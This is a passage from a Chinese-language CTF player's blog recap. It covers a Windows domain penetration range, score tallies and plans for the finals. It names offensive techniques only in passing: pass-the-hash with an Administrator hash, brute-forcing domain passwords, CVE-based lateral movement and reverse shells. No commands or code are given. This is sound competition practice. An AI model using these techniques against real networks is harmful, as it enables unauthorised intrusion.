赛后发现是确实是抓 Administrator 的 hash,然后 hash 传递过去。。第一个 flag 在 174 win10 上,而他在域里,还有一台在 174 机器的另一个子网下,需要爆破域用户的密码然后借助 CVE 横向过去……
不过没时间赶不上复现了,摸!
小结
于是通宵打了两天漏洞渗透靶场,累死了
感觉 Windows 攻防这一块喵喵还不大熟悉,后面有机会有空的话再来补一补.jpg (咕咕咕
吐槽一下怎么不是所有机器都有 flag,好不容易日了一台机器下来,上去发现啥都没有,好亏啊!
(然后又想到去年线下打鹏城杯那个靶场,靶机里数据库 web服务 root下 好几个地方放了 flag,虽然容易漏但是至少拿下机器 shell 有 flag 的反馈还是挺乐的,虽然打得也挺累的就是了。
还有个挺坑的地方是,他靶机的 DNS 都配的是 192.168 下的,但是那个 IP 又连不通,于是如果反弹 shell 或者下载带域名的 URL 就解析不出来了,整的喵喵还以为不通外网,后来直接试 IP 发现能访问才猜到是这样的。
而且 VPN 网段不能弹 shell 回来,中间的路由直接丢了,而且通过 VPN 访问也是走的中间的机器跳过去的(
不过这漏洞挖掘的比赛也好卷啊!
喵喵一个人拿了 1k 分,也就是拿了 5 个 flag,人麻了(
可惜最后 CTF 和 漏洞挖掘 居然是按照 7:3 的比例把分数加起来,感觉亏死了!!!
于是连着打了三天,累累,呜呜(
不过上海高校单独排名,躺着也能进 线下决赛见喵~
不过说来这应该是喵喵最后一次打上海市赛了吧(喵呜喵呜喵
官方 writeup 也出来了:
(溜了溜了喵
